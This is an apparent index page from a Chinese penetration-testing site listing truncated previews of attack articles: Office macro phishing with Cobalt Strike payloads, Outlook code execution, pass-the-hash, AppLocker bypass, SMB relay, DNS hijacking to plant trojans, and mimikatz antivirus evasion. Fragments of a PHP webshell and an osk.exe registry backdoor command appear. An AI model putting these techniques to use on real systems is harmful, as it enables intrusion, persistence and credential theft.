office常规钓鱼手法
office常规钓鱼手法
2018-09-11 15:33:40  
一、宏 在选项处->自定义功能区添加宏 STEP 1   STEP 2 STEP 3 点击创建->Microsoft Word对象->双击 This Document 使用cobaltstrike生成vba payload 点击启用内容 成功上线 二、dde ste
工具 技术控 查看数 13875,评论数 0
outlook代码执行
outlook代码执行
2018-09-11 15:28:04  
前提-获取对方帐号密码,并使用outlook客户端登录 测试环境: 客户端 outlook 2013 登录邮箱后进行设置 inbox->右键属性   home page 设置payload地址,将show home page by default for this folder勾上   test.html内容
工具 查看数 24245,评论数 0
pass the hash & pass the ticket
pass the hash & pass the ticket
2018-09-11 15:26:50  
一、pass the hash 环境如下: 域控:192.168.3.88 普通域用户电脑:192.168.3.50 渗透测试人员:外网IP 前提:已经获取到域管 hash。 通过socks隧道传递流量 本机执行 ./ew_for_linux64 -s rcsocks -l 1008 -e 888 普通域用户电脑执行 ew_for_Win
工具 技术控 查看数 10589,评论数 0
bypass AppLocker on the exe
bypass AppLocker on the exe
2018-09-11 15:15:33  
一、配置applocker 启动AppIDSvc服务 gpedit.msc->计算机配置->windows设置->安全设置->应用程序控制策略->AppLocker 点击可执行程序,创建默认规则   除了上图中的的路径外的程序,其他路径的程序都无法执行。 当前用户属于users组用户 shel
工具 技术控 查看数 9437,评论数 0
不使用eval、assert制作webshell
不使用eval、assert制作webshell
2018-09-11 15:07:32  
1、include函数 实现思路:将POST过来的参数写入到一个文本里,再去包含文本实现代码执行 <?php @$pwd=$_POST['pwd']; $include_file='code.txt'; if(isset($pwd)){ file_put_contents($include_file,'<?php '.$pwd); inclu
工具 技术控 查看数 24333,评论数 0
通过RDP协议横向移动
通过RDP协议横向移动
2018-09-11 15:02:19  
背景: 想去目标机器上抓chrome密码,但是用户的ntlm hash解不开,导致不能去解密chrome密码,3389端口是开着的,win7机器默认不允许多用户登录,贸然上去怕被用户发觉。 思路一: 445端口开启可以通过wmic执行命令替换快捷键 快捷键后门 osk.exe reg add "HKLMSOFTWAREMicrosoftWindows
工具 技术控 查看数 10754,评论数 0
劫持DNS通过流量植入木马
劫持DNS通过流量植入木马
2018-09-11 14:48:25  
前言 很多时候对目标进行渗透时一般会从web、网络设备、针对性钓鱼这三个方向入手。假设我们控制了目标网络中的一台网络设备,如路由器,内网用户流量会从这个地方经过我们怎么获取其权限呢 ? 这种时候可以在路由器上抓包分析用户流量,比如启动xshell、notepad++等软件时发送的更新请求包,然后我们替换软件更新的http响应包达到植入木马目的。 分析流量一般用tcpdump,如果
工具 技术控 查看数 10682,评论数 0
SMB Relay Attack-点我链接代码执行
SMB Relay Attack-点我链接代码执行
2018-09-11 14:44:49  
前言 smb中继或叫smb请求重放攻击,B是一个smb服务器,A来进行认证,B将A的认证信息转发到C上,如果A的凭证在C上认证成功就能进行下一步操作,如创建服务执行命令。如果在域中控制了某些常用服务,如:WEB OA系统、文件共享等服务则可以尝试使用SMB中继攻击来引诱域管理员访问达到获取其他机器权限的目的。 环境 192.168.123.10 win 7  域管理员(admin
工具 技术控 查看数 10511,评论数 0
多种姿势实现mimikatz bypasss av
多种姿势实现mimikatz bypasss av
2018-09-11 14:40:48  
前言 平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。 下载最新版360 未经处理的mimikatz直接就被杀了 下面开始进行绕过360抓密码 姿势一-powershell https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfilt
工具 技术控 查看数 11032,评论数 0
随身系统:U盘的N种使用姿势二
随身系统:U盘的N种使用姿势二
2019-01-08 10:24:20  
U盘随身系统 办公和渗透系统 deepinos深度系统 专注于对日常办公、学习、生活体验的极致 适合笔记本、桌面计算机和一体机 它包含了所有需要的应用程序: 网页浏览器:谷歌/火狐 即时通讯软件:QQ/微信 声音和图片处理软件:网易云音乐 幻灯片演示、文档编辑、电子表格等 2.kali linux 渗透系统 ka
工具 查看数 12261,评论数 1
  • 最新评论
/css.php
正在加载中...